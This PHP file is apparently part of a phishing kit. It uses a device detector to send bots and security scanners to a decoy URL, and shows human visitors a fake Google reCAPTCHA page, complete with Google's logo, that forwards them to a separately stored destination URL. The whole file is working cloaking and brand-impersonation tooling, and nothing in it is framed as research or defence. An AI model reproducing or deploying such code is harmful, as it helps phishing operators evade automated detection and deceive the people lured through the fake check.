<?php

require_once 'Logger/vendor/autoload.php';


use DeviceDetector\ClientHints;
use DeviceDetector\DeviceDetector;
use DeviceDetector\Parser\Device\AbstractDeviceParser;
use DeviceDetector\Parser\OperatingSystem;
use DeviceDetector\Parser\Client\Browser;


// Read the existing URL from the file (if it exists)
$existingUrl = file_exists('saved_url.txt') ? file_get_contents('saved_url.txt') : '';

// Read the existing URL from the file (if it exists)
$existingUrl1 = file_exists('saved_url1.txt') ? file_get_contents('saved_url1.txt') : '';


$script =

'
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>I\'m Not a Bot</title>
    <!-- Google Font -->
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@600&display=swap" rel="stylesheet">
    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css" rel="stylesheet">
    <style>
        body {
            background-color: #f9f9f9;
        }
        .recaptcha-box {
            background-color: #ffffff;
            border: 1px solid #dcdcdc;
            border-radius: 8px;
            padding: 20px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            text-align: center;
            max-width: 400px;
            margin: auto;
        }
        .recaptcha-logo {
            width: 50px;
            height: 50px;
            margin-bottom: 15px;
        }
        .recaptcha-text {
            font-size: 14px;
            color: #606060;
            margin-bottom: 10px;
        }
        .form-check-input {
            width: 24px;
            height: 24px;
            border-radius: 4px;
            border: 2px solid #28a745;
            background-color: #e9f9e9;
        }
        .form-check-label {
            font-size: 20px;
            margin-left: 10px;
            font-family: \'Roboto\', sans-serif;
            font-weight: 600;
        }
    </style>
</head>
<body>
    <div class="container d-flex justify-content-center align-items-center vh-100">
        <div class="recaptcha-box">
            <img src="https://www.gstatic.com/recaptcha/api2/logo_48.png" alt="Recaptcha Logo" class="recaptcha-logo">
            <p class="recaptcha-text">This site is protected by reCAPTCHA</p>
            <div>
                <input type="checkbox" id="not-a-bot" class="form-check-input">
                <label for="not-a-bot" class="form-check-label">I\'m not a robot</label>
            </div>
        </div>
    </div>

    <!-- JavaScript -->
    <script>
        document.getElementById(\'not-a-bot\').addEventListener(\'click\', function() {
            if (this.checked) {
                const confirmation = confirm("Confirm you are not a Bot");
                if (confirmation) {
                    window.location.href = "'.$existingUrl.'"; // Replace with your desired URL
                } else {
                    this.checked = false; // Uncheck the checkbox if user clicks "No"
                    window.location.href = "'.$existingUrl1.'";
                }
            }
        });
    </script>

    <!-- Bootstrap Bundle with Popper -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html>


';


        $userAgent = $_SERVER['HTTP_USER_AGENT'];
        $clientHints = ClientHints::factory($_SERVER);

        $dd = new DeviceDetector($userAgent, $clientHints);
        $dd->parse();

        if ($dd->isBot()) {
            echo '<script>window.location.href = "'.$existingUrl1.'";</script>';
        }else{
        
        echo $script;
 
        }




?>